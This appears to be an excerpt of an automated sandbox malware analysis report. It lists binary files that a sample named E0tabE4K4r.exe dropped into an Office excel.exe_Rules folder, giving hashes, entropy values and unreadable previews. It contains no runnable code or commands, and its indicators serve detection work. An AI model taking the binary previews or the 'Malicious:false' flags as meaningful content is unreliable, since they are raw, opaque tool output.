                                                                                                                                                  Size (bytes):1269
                                                                                                                                                  Entropy (8bit):7.832961128194963
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QKFZduNOsMSXVaDDJWvvUoEP2+6LbA6aPbBt403RplPA2bD:QKVuNO/AEWvvUou2b3NaFN9D
                                                                                                                                                  MD5:7221AA794444E9E2186685EE55C3BFC4
                                                                                                                                                  SHA1:86825D82D987215808C177A3A1C1C0CCD73F51EF
                                                                                                                                                  SHA-256:61FF876E57E5FA6B985C13B88DB459AF5C8AF430C48EAC15FAD1511CCBD8C932
                                                                                                                                                  SHA-512:A394E527017804F70E79E80E71AC131E66CDD95F8FEA88BFFF5F86377133226046C51DBBED0AC54C1FC0B2C52BCC4D48C049574A935C1B1A6581010210907245
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlm.P.k+.I.....z.Ra......L.LG.?V]\c...../.b...f..r......c."....."N.>?.[.K..*.9f...+.@.WK.V.b8uS..1..N.f.9m.CI.Rbj9v[...'..}7...._...*....q.=.(0.F.LcMh1..U...8.N..........@....Cl..<..{hgu...N.z.;....s.........,..]........|.....,....>.................x.....(p.....J>.v.9..[{%......n...vHe....a....yb.x.V.....$....NH&L....v..<...f>..^C.... .....~S-..lK.W..?.vv.......H.Ti.s.'..u9.1...o.../.].sK_G...r......Rs..g..w.../sh{Yy3`..=,.=).l.0.PZ..+n..6yT.s..;....;PSN...|E.2-.a..........5t.z..W.2V.......FW..........%.f.l.[..5.Om.W.].1xu.w........U.)..=.^...M....-..h.Z.....'X{f.y...So$.Q...V....5......r.hqVe;.....y..a....H.h.D.27...m...-p..=z...U!.M......"t.....J}..."R...c7.%?\........$_ v*8../6L.{..Y...T...i.F.To3......m..^Z_..V..{..g..9.<'.=6..gs)....lK)MPKu.F..S2V~$.t...g......{..~L...\...hOvC-2.....G4...g2,...X.9/5.\...(l..uD..9........4.4.O..p.U.F..z.u..>.W.......L...{iP4..C/.o..E..2L..~3...:2.....#...Q.x..F...5!Mg..%.A..(..*/0..>.....5..#.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1994
                                                                                                                                                  Entropy (8bit):7.893159100016611
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:whcOIMulnMJbeIr70YTJzGi26lB0sA8eJSmeT/Iaq2+KoTNrHgAGuD:wpJ3DC6l1enezLq2iZrHHz
                                                                                                                                                  MD5:F09C013FDB9C73A99D75876F7D13B74E
                                                                                                                                                  SHA1:45557EFCAC5106E4DD937054D24F7569056E88A0
                                                                                                                                                  SHA-256:6CB24517A984AAE2D3892FF27684EF60F2D166147DA3DC55854C069A846DAA5E
                                                                                                                                                  SHA-512:A6423920512C5CB8B163132E45B8C3B4372E83F240A0C9086EFD59051DC77942F6D2ECCA49FC6A132DD3930FD6B08428FF56405A7D639C80268AE415AA175FD7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml_..*...B.>.D.B.W.....TY..#*...R..J.X{.QF.I_..O.....b.m)..F.^..^.jI....0D....H....w.,. ..YE.H....6J......(..T0.M.bU..`.T....i....:..7'#?..)....0..a.=.]w......N..{........".i_.'......(.Nb$6....i..../]......(..W.....D....AU....4.h.3. ......."r..u..p.b.7.....T#J.....F..;b8.$....}Z..^.....v.y.k.wnR..j.X..V+...;Y..#`.mj..\ ..i...q..Ty....k.......|......[W6............*>F|.....|.....>.a./Iq3`n...X,`.`.h..'.....k.s..W.{..)9v.A.7.Uw.J6g. tG......+..|.&..d..!|N"..}n..;0D3..swbI_...e..Hg.;b.Z.i%...\.Fy.ou:... O..9.../=..NZ,8..#pd.7.Q...%...=X..?....y.(M.....yb?..m...K....8H....;[..R...Jt.Q..W`..F\..@....~....^.0..Y.%.>.K...f.c..S.$fOU.3..=.1..{ ..$..4..!.....;.^o...j..n.......u..v.7'E!./:..M.{....L\%S)T.6...F..2T.0\3....;.*.#.N!^.... .........kI.n......jW...1d...l.$....k.G.n..+n..xJ.&>.....r.%.,.M..%%$.v.I.f.Sr.m..W..S.6tm.w...XS.$....cJgM.~...xg.T..3..io....U[.U!b-..YJ..)...(9+..R.....l....h...$.8'..W.A{..v.%.gk..(.y6!.'.(..cZC...=..r.&.K

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1506
                                                                                                                                                  Entropy (8bit):7.866516516100088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WEDCiEpfXzIZtHMp3ARYVgTcNEfJlLb5tIFtVk1gCvp4/stMFdFopQ78UgA0qyIj:WEGiEhIZtHMN2Df5MtVk1gCB4J+bA0UD
                                                                                                                                                  MD5:AC945EFB4220A68144E40975E24B9F97
                                                                                                                                                  SHA1:2270BCE2700F54EB8514E693375BB30CA36476FD
                                                                                                                                                  SHA-256:0116F7F2528EE03443E1A62AC20D9D50409912C26540D455DE21FCBAF427DFE1
                                                                                                                                                  SHA-512:F6F9DE1E8737D0A755024C533D423647D50FB62A4CB4F81002BBC6030F8A8FBF51C24E16BEB09B616925A831125139D7B97214819C45461CF5A5AE842C966D15
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..Jk).-Z.....Zz.@.xot.....S..9L..87j4.....w.D....a....rs..1.|...V6.M......0....P"....<G:S..*..A...DB..>....>g.u.Fs.L,.5........%..e...^7.<......G.J..........Q...>#[.n...._....(...d.uS....U........(..i.).Z8.H..6....GZ.....~.$........LX...3.."K..H.).....=.?.^..ST..`.._.....U8...X&.....?.........S.!....`..m1.....7..\.B...G...p....C....;.........0S...T..s.6.bCn...ii.m.v..*-.G....N..v....%........;.Ql.....r..4.Ao...?.v...F..F.&9:..-.p[......|.N..;..0..[....+.....bU.fz....G.a..3QTN0.1. LY.P.7..T........y+#Q8,.P.@.........j.....e).D..D..i7 4q....nP...H1ZT|u.....:P.,'p...d&.~.HS<....h.~dAs..o...e.p...I.....2.@.8..GYh(.Q.qu...[...R...B..Y........%#.(...U....N...)9......^......)a.v.;...F...'...^f.Ao.E....D....k..d...4... t.r1..l...P.G..2*Y..@..E..m.;.x..-].f.....].bmxl.5.........^T...zn...~).C............_q..ncy7@...J..tl.YC..j$@.,..>.c..).z>.....l..p(-Y.....B.K..eH....PM..G...S..p.&y.f.iLM..5.......y.^...H..@......&.r...0.W.{`._..drI:...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120127v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1511
                                                                                                                                                  Entropy (8bit):7.869587510678625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:zZgbIjMdgsDRNF4Reur/HxDUC3kEyaaQJW+0uX4a/cxkGJvmrbfTns162bD:lUIjSgWNWBP0EyjRQX4icx7doTnsHD
                                                                                                                                                  MD5:5C22D6CB0A42EF7A16268F1B06A17B60
                                                                                                                                                  SHA1:EECFE659DEB06B6E7EE1A652516041498C4D7F6A
                                                                                                                                                  SHA-256:510609699CB69C5E45690B10073566F59D6B8AC5455CE00A6725E45E8E83960E
                                                                                                                                                  SHA-512:CB78AA9698DC4D7AC869DB0D36AD8940D98F12F9E6D1851119F3FBF997BCBF0AFA2C73E29D0466D2169B737A3E161910C1E4CFCF25F40A3DDEECC3D8222B7F90
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlL.M.U.r>.0f:.^`..LkMd.e....../E.f...G..E?..I.K,.....o2.O....o...aO.hu,E.8.n.......rv..s|.K...g$t.............D....\..";v....-0./.^.P\........"#*a.#3.G../......:....&......t..X89.='...>.e...3fh....I..j.s...-..3..N.Ff%..J..o....V.L.Y..Z..8.n.\...U1...$._.I{............[v=$F..e.I.....9l.m...dp..]..x..L...q.X........MrO...Z..L.=..m.....Wm...K..=#.....E.K.{.R.@...J.l/..Rj1...9-q..T/.N\.U.:....;V.,.... |x..;.Be.9.h..<........&.G{.`....>..P-.. .....+.s..z..`...1Y.=B......2...y(@.. f..HM4M..)..s{.~.0OC.`\.h........n]...U...:.&P.z..3._.E.0q_#..}.f...4..|..A..HW-..}.#}#T.a``...[..X..3....@.........Y....[.K...}.N.\mt..v9.Dk..B..6.Z.......2.l..IX.z8......}...+.....@Hl.......#..X E3..#o ck.._6*H...A.I..e....9..4..@Ky.l(I`..0..t..j.c.T7.$.rZhK.h..0i..?..........jXyv_...#O/G.T..q.0.......:.&.aB..... _X...\U.-..._...[@..l...P....b..C.P....O.N.p.[.....j........Omfn@..'w.Ns.4.`.~xs..p..8i.....R....NW..*...v\....~...7.>...\)...e.O..MC._.k.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120128v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):991
                                                                                                                                                  Entropy (8bit):7.780238264299314
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:dC6Zv1VpOcrB/J4jHoGqRjtW5IntzBz13R1Vjx9iAxgoV2bD:dCstHjF/J4jHoJG0tzd1VjxEACD
                                                                                                                                                  MD5:7C517049C6EBDD0E51655FE62F116616
                                                                                                                                                  SHA1:494EFBF1FBE90E58BFADB480DA413158FC8FD78E
                                                                                                                                                  SHA-256:AE03AD19410D1C6E538B32AB0C50CF0E9EB54F4D5A71A0DEA12BA45BD4CF261F
                                                                                                                                                  SHA-512:A792FCB712F90817A253F143073AB7ACD0274990A594CD498E1720283802F4C30B93B818559A2DD8856BAF3E3206FB3512763704B870BA11224D3752335D6355
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...j8A.........+.....Pj...Z...5...............(.cq...J1.......%/..b..G.....m.....1..1FVy....59.....2..........p..Fq...zU...Z.lgz{<.K..N..w......P.`.!,.XD..H.Lh.".C.M.v.w5.V.G4..M.8.....L.C.=v...`.........k....-..`.u^7..T.z..V......V..Y.A.-. .5..?..*..../.O.boy_.?..n.....C..J\...t-..o...m.1U...,n*..qk.FH..;......=...I2~..]C...._3...D..v.X...a~...F.N3N.4\ceX....@(..`.0.......G.A.'...XR...'-.....8\..1Rd.h......n.Tf...5b...&.d.........k..P....Z.M...qX4....e...Q.B.4......./....IF..k.....!..u.....}..6..n...!sTq......d{"..$]....U..&.s... .pG....Al......\.|R..#.....4.F..A.b.p...q.d]=..scS`7..iN...|.....S..%....... .&...e>....b...-...o>.......=..C.....e5.Y./......5$..z.6h9.c..YW.#q..;J..|....u...5`....?..2{.\....l.[Xy5\.Awqi.Bh...d.C=.p.E.o.x.X;..5.5..8[m.r....<!:......b.f.G......*M]<.;..:.x...-(..iY.d.%.,.g..p..o.....U.q.f5..g..SK..nwc...Q.o._E....V...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12019v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4150
                                                                                                                                                  Entropy (8bit):7.9592681252835735
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:6N54zCIs7g32XIH27LIoHB/CJS5hQJdeeg5ZBjRieo5pNP:6NcDcg324W7LRIJn7g5f2pV
                                                                                                                                                  MD5:FA881C32E9EC437204239AE1D795B998
                                                                                                                                                  SHA1:18F3DE89E2625F825170D872493F16E8A63B43F0
                                                                                                                                                  SHA-256:245046E986F340195B9F6FE2C8811136B73200DB26C3E46D1E47CE47A091BCFA
                                                                                                                                                  SHA-512:D66F63D28A92449BC4A2161086949EE87C59CA8ACA44188BAAD2283DD68D7D44DEC80544072FF37663478FD56DB5B7EBEF2F415B54E0D53C255B3BCF08C1D95D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...y...._.;5.Tt.v..mD.............{..2...m.,...1,i.F...A_....;N..)...G...^..\3.+....We..).....[.S....&...Y..3....ix.w.c...|..o..)..._o... ........k.`.QLdq...Ab.@.R...+.C..,s.[.".......5.s.E.,......us..a...-...........p..y}...Q._..^.R...eN..5.........=p.=&.3<......^..%.q0.&..."7.fD.#........:.p..?...{....V._..7...$_....5.Fr?.5T....Bq(..e.7...fwb!...%..Gi.."..w..0...:.....x..m1.....#..=...?0.....}.I..L3.../.*@.....|..G3..!!...#.:.....a.EE&^..Na<..a....&....sV3..1MdC.v.q....=...O...BWmA.d.....g;.P#...49bXq.sM.f.H...EL\t.!...6.^....G.U.K.Ja..> ...0...._.%......l.&4v..W.[.=\.m...t..aC..d..`8W...[..V.9'..R.5......A...y`....iE.....U.^.)Sh.M.j.E...>+.~.z.z.Q.Y.j.....e..d..e.Zk!..[6....g.r$sG.{.}wW....4d'.....T.z..`'\...W..y.6.`.....K........(:..6-...T.Ai$.M/,|....O..:..<..".U..n.oM.@...}5]..\cMd...~\*Fk...vt....+R.'.l.vU....4F...|]....9.g...-?SP...^....m..G#..U>..I%*Eg....XR..S.&..'Gt.._{-+...2.I N..|..M..".%...._8...$j.[gr.......+.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120201v14.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2974
                                                                                                                                                  Entropy (8bit):7.938869471419975
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:NdFsZoZfAsIYrPePTfXRrhu0ftdyzx+oF3hABz25YkoTinqntUtxX/WD:bFsZotFNrWLfthvfts8ojAV2foT5toxm
                                                                                                                                                  MD5:19173FDDC9CF2E0C607E3E5B919074CF
                                                                                                                                                  SHA1:1F4AA0D307CDE6FC485ECBACE43C4395BA1445D4
                                                                                                                                                  SHA-256:F6D4A27A9E5AD2D3CB2A4DE45D072B7C316D616B4323D747821DCC02E7234115
                                                                                                                                                  SHA-512:5EE86DFAB0779CA08D34EDD5B4DB1C8F09C03701B98757676FC71186A3D2094774B2BCE8B0EC92FEAC763794D778455182ED863BDF2EDB59FA2FF2C3C9112A99
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.L.SNf.....:U0.J.P.#t....*....B...%.m.<x..S..cM.N$=."..n....9,.\..yi.0...n.o.1r].c.0.e.a9...k..%X..c7..2>..yOn"&4.f.....sI...]..+.>.t..VU..+..MW.,%Rs....K.h*r..Vx.<..Z6.y.'<.'T.QG.y3(+...)].....U.3d.1W'..{&.#.......].A. ...I..-..p.......wy.z....Y..]Uc...s%.n.r.;X......;..B.P <k,.o......|.X...hW...+.*...g.)..I.C.*o0n...@.]h.Ty...=....".Cj.=...1.H1.4.Ug......./....."...i...E.TV.8..s.K.&.....R.X.5. ...K..v...G.m.... .u.......K..7....{M..R..~lzFv........f.o_....v....$.h...z....`.[.S...J.b..<.......bFq..A.Z...:...u..VC..=.^.K.r#...%....|3?f."....P..`...yY....fq...u8j!.p....@...L<.....}.Dh`.b.f<...z.=..&*;...:.d.RZ...x......C...{3|..S?R....}./....[..u./....&3=#..Z."....0s...yCMN.s..@+...&D.BW..'nDL*..b.d...v.A.\..K.........".....6.80...<w..){.^..6...v2..)....*B.m:.0....J..c..(.../h..v..W......#..f].#u1..V*.9.oTPt?.8W..(..>.5<t.%.y..M./a...U....$...k...LX...'..v.@.Z....7...Y...A..X.......2ONzf....7..s:t.A......A0O{&p..M2.e0d...%

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120205v11.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3363
                                                                                                                                                  Entropy (8bit):7.939140741743492
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:WSLy3nzEZ5JZd44VjbykfoVeNrehkMmFU7CN313NHwpd3:jcnz0JZtVKk+eNehkMmK7AF3mpd3
                                                                                                                                                  MD5:BEE772F492B505BF08F310E925D69D09
                                                                                                                                                  SHA1:E027B179A8CA9C6359140E9EBCABC7443175474D
                                                                                                                                                  SHA-256:695F30E81B318A4C9C54EDA4AE0C3B788F427A89F3400F5019996D36E2A82D6D
                                                                                                                                                  SHA-512:43AF9CA7339D20EC3AAE67F944DD3E35EBD1A081CCE5977CDB80AE43B8937529725A541C31374DDBEAC9D868E6678EBE8A0FFED507CC6C8337727B236E414F57
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..*..-.......co.......;.g.J.TW.`.f.>?{.3k>....h.{Ge.....Y..s.E.....7.e....$.@i.,&.y.^-..S...)0%..+.&../.......y{...Kx.8....g(.)..M.G...@..........Q..g.j..@[q.k..~...L.........2y.N..%.m.s..;Mz.......J.l.......i.KK...........\..S.e....t..\."Dl.T.|..M.)C..z+4Ya....j...i\.Y=.qw......:.O...Y..,t^....G.qo(g....K..D..O..W!..2F.+0d..S..... .f..S.nHx;..?].....j..e..y2N\.K.cwN.q.(6..N..C..o.."...qF|...sXfC.....-.6:..~L.q...S...E..Q.&.Z..Y<..l}..Uj...s..G<.T.sX..{..&cq......pu..--.5.....A?.....z.e.n.....|.[......-K........X.B..Ti.L...E;*..x.....o:..D.oy+"{t08...bk.:..hv...Hv.........;0.1.t..br-S...}.T...`*....rs....*.2..3..zH.V.....W.....Q.N._~...6...3G.......W.MU.+....NB+.%N.^_.o..``..{.c6$......:B.......|.....K.......4....q..4O.....<c<.h...K6.[\....:.U.1\...Km...X.S. .....Te..D.b?.G"......s. ..8..=a.....,sC..6.....IjD^...l..g.CK......UL...J...../..u..^..^.|.M...*.,J.;. &#."...q./....O-.V..04t.!.T^..po..Q.X.sq.M..._.....^.../z.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120300v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1295
                                                                                                                                                  Entropy (8bit):7.845647602991193
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PjZDVFeESiv+QSkIBnaae/tIhwN58dpzm+k76bXH9ULJ9ifpD27gH2bD:PjZDVFUhkIBnct2wNi7SF76yL/Ih27jD
                                                                                                                                                  MD5:7AB500130391D8D891EAEE1E43BA884F
                                                                                                                                                  SHA1:2EC1E2CD9959B3B9559543469954F1072504FB44
                                                                                                                                                  SHA-256:079BD581362A9B01A053BA54BB2723EFA7E9CB32963F25A29D36DA1B08E0417C
                                                                                                                                                  SHA-512:DE4078D976F76D27531290106859F2F17A4052581BF7F2F8DEACA235F7FAB805C45438E6D5FE93C19D5A3A25A54E0538A247EC097E7EFCEFDFD8DC4A5A1DD0C9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.?=.o.W&.)V...f.r.o..Pt|u...8..p.zf..@"......fC....._.....%....U.9.....T...J....8.J.b!.j. !s.....?.. ..8y..8~w%.V....j....(...ud.....1[.r.,T..b. ....$%l.:.{-.......?..|.5.3..e..^,....s}..f....^9..;.K.?O.G".[=K..l..7n.\.J.E4.:t....;z....^.N.J......(...g..J...t.O.za.)..w8.sW...X..B.. e.}.l.[..A.C./.j..n..h.n..X.w.q.5.....;M.M.<..h.4.Z.q...}/8..z.....Z..G.=.Lf.=;zT}.T.x.t.i......l..y.7..{..5..IO...n=.HcEP.T+..H.O....Ags..^t.{.<...N{.......#5.]...pK.-+A......).6.....d..o..R[<..`|/.......B..gXm'......m....Av|..n.....0.....y....*.T.a.....'.7......9..phm....!V....wT\.......vt.~9(>.)...)..R...j.%...N{.]....c......lh.Fx..44..r...yU.s.*.....<c.M....F.Tu#..M.xCpx.....e.Za..<..f..M...w..../|....}...T.>..>...="..H.].b.x....M..0.r%.....D..7.sb..S8I.Rw..B".~!.f.G.k..`.8....v...;<_.....I........a)}...iP...XF..M.B.A.. .._.K...93.@..{....uzc.%..C 0)..(.F.;}.B.U..2.+.P....EQH.z`r..^.'.j|......gf..::..'....E....`T...#h...Uz.n.=>...w.....W....s.....q..P.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120304v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2582
                                                                                                                                                  Entropy (8bit):7.928156001841866
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HMcWu1lyrtPY5mrUEdsG5BYn1wGXBaVEFCbD:DWMl0dWevdsOeaiBaVlX
                                                                                                                                                  MD5:91EBC94E98CE369A1C0C9CFDC0BF46A9
                                                                                                                                                  SHA1:B5420D53AAAD2473BBB986A566B11406B136184A
                                                                                                                                                  SHA-256:C186388918DA2D1BE45CBA33387ADC49050C2819727B5A9729E379F9ADB80826
                                                                                                                                                  SHA-512:9DBD1ABC20CF6FF1EB4DD615E265E72A6953F49A65A130982EB9A17D85B12580CDBE3BC3CBF99E8E77EDFE5F7B7B50F77824111162ACE7F9BAB7D8FFDFF3C9C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......[...9!.5..B...`..%svp..N.:...7......Y.RW.)....(...V..2L.i.........H.]c.....V...I6..R...'.ot .Q......3|.$<.|..g.2.bI.^..s...R.d.......l......d........B/....eL^c...T^3..Ke... .m.........S...&;.H..*.p...wk...+H....'....6.!...O.>...R.c.e.&t..b..Z.S.#S.2.^E...b.j;.;Y8.3.o..cI.C.....G*N.`.......v...m...L..D.z.M.^).V3.......\....Y.z.V_..Ao.a......_.O0....U....^......P{..Z.4i^F6.o.......d....3.....$......@>P..Rd`J.. ...*#".m.........6..x.J....^:...rW...P&[.Z/J.....xm.!...~v(.{J...-c..........R_.?...D.g........pj~....P..P.8..B'..a2.....F.*.U..7U.J.Vn.p..t;...z.G....P..c.vY0..w6../`m..#....Id....._..J.:...@.L>....F$.....`9.|@....8.Z.&R......~...'..M......c;...`Q...yp]X.5......f....8.5......u...K.t.>...".^......B\5'..K.$..CXl.)...(@b..bX.o"..q;......I.h1k..I......,....t..<!>....}.Ej......mi.X..BPR......$....WgxL..~...U..!.z.[i..........`.3...a...Q.t...%.Sx.E7..p.%..SH3....c.]'.G..`8..g.....F...(.?..L-....v..K...cq.LS.+....<z.e.6...F..%y..{3.S

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120305v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1787
                                                                                                                                                  Entropy (8bit):7.879180798404693
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:YTHpUeTaD2GxIPbtXSIMcc/Cf3v33t+Revcc3oh4eZxfmOVPLBsreR2bD:2JUewzxINGMkQ0EohBZgagxD
                                                                                                                                                  MD5:C5891E479D156C56D7F0775E296D4A47
                                                                                                                                                  SHA1:4B5BD562EEFD115EAEAC894A2300565ABC1DA2C3
                                                                                                                                                  SHA-256:B53EFB10BCF866766EFD1ADC7F729CED7F5B673D05E18BCD172DB7446191B0BD
                                                                                                                                                  SHA-512:F1173B06858F1CB2A041CB05CC91017941B8AEFBF24C0D9B061A5E1B329AFEABC8903674FAC75472EDBB31EFEFCEEC2CF1CD25460F673C0DEDAC557241751E62
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.jb..b.....T...tukO.Q....-.*.f......j..*~.}..?i.........v....&I"7..9<.6...[.[...,..M2e..Y...4.\.A....-4=..46..aO.J....H...jT.5)...j"...KV/.s...v.T.\...:.<1........W.....N~....q..p.X......c..>..S.V...cXM...8.S2$)..dq.........4.......|i.n..S.z.iD..X....mzN..........y, .*s..p....7Bm...6..M.f.|R.c3...._.R...}....F.+...i'...Y..L...Q...>..C...c.R.J.Ih3.d.i.^..yH .dl....._.=AO.....@>...(...u.B.<...T(x.n..cy8.j.7+{<b..n.c...i..F...;n?..O...-.N....2..){....sJ.yfgeh.....q3.`(h.....qe."XFW.$.!...n.Wk....X.......L.........KWX.E..{y.e....m._/...G..vbBu..S......<.f;E.p.0?.Ur.6.i0..,}.5F.}..[e.-...wq.Z.I..i....D......).fI..v+'......'.....lM:-G.....X.)'.+.....nM..r....>.......,%.R..AUUPT6..hT.K...l./g...{..=....#.....3\.lLUQ...8..)....v..8..x..........%....|......\...oR..?... ...3"....Z<%.N8.X..l9...3MN|..d....%...A/.G..U...s.i.........&<.,.).i..?......U...zt.)..*.7Y..l..,.P....[f.l.H.bN........y....'.{DY.OX...I.q8T|..6..B%1..0..D......l.h.JQ..<K."

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120307v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1583
                                                                                                                                                  Entropy (8bit):7.866554259983775
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ng4sty2RomSX+kGT4meLvMCGgTL+alVwVw4/P8p3JtbsWRauJEbBGYF2u1J3QiyP:ng4SyPPikNvMCGgTvVZS8XHJEFz2E3aD
                                                                                                                                                  MD5:B51B0C1D6EC482267254EB735D68566F
                                                                                                                                                  SHA1:723C20B3BF26797FC3D6E2FA9AE3AAE8ED9246B8
                                                                                                                                                  SHA-256:0ACC509B8814AB17573F6BBDCE2866592F42378B171CCA8CA4A91D3D176BF8AC
                                                                                                                                                  SHA-512:701EB35018796662130DEA63F6F5502D4182C58ED6F82242986E26FD1EA437E14013FBF7937E69C08DA5E7DFF786A01A0E7FECCED8EB9D0D9FFD2A0B6010AD56
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlJL...).....[..e.P.6%..$qD."Y.;i:.;.../?.,...,.|.. Y......l....^......1......IY.F..o..U.hBY.I[)S+.N.l*......./..GR.........<.~._!.... .....\.........a."W."P..Y?..Z.,.}.#>>.[.......U....q9..G..\..9....c..Z......s..Va.!^"-{)@.wW....j.....c.n...o...j.&(~..K..e.d.5...rc.U/..6Z^$@..\..K...khy..i........V..n......Z...A...a....|.h..M.x..%.|.........2[......3..O....z...1).....=..:.3..5..&S.u..<1T.9.....=3:.:....%....G..69.m.......?.=...y.'l...`&bBo..36........)....=5..b).y...^N....{...@.....X.2...H..#...N....:.o./....K$..@].#..0.L.......G...+.........<.aF..^.. .T.......:........=..7.jecr1,x...my..34..P[.n\.=.....?A.3*..."....!;........c..:.\.04.2.Qh.mJ.U2..#dN..~.\c.`."..*J='y.e..~3h...+......U..'.{.....{Z./.D.y...I._Ix.-p...,.l....m#P.......T...l..Kg..D...k.M.24.......1rt:...%y.E..3x....G?....X><....: \.F70.g..uxD..xW..%_...r==!b..*;....y.DY&...R..I....;..#.....c.x..v..f....5..X._WD.....lP.......%.).rd`.&a.*.....\.{.B.m...F.........o..}..0.AZe.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12035v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2801
                                                                                                                                                  Entropy (8bit):7.923728950667338
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:owQs3DjQRyqJzE7VawEC98x9xL25fNAyPIFGQRn3DT8YbjRz0JrwNtrGzBERB8yN:ZI14VaBPEfNAyPIFjRTTV0qNIEz8Bov
                                                                                                                                                  MD5:F1C98D0C7C58FF08997B95348385FD93
                                                                                                                                                  SHA1:7E79722861008377325FFB21FC26D8A860B4218C
                                                                                                                                                  SHA-256:29841D3E1AF424DE9B55A74F1486664B61EB860D07FB19A637943C147440BE97
                                                                                                                                                  SHA-512:3133892AE5DD25A8F9DBA40E71CF7DA94ACFA537C3A51DC0DA840354F31ECBB969F3E26D4622E3CCD54D1DACC79F6D7C3294D3F9126A3F69D1D463700CCD8568
                                                                                                                                                  Malicious:false
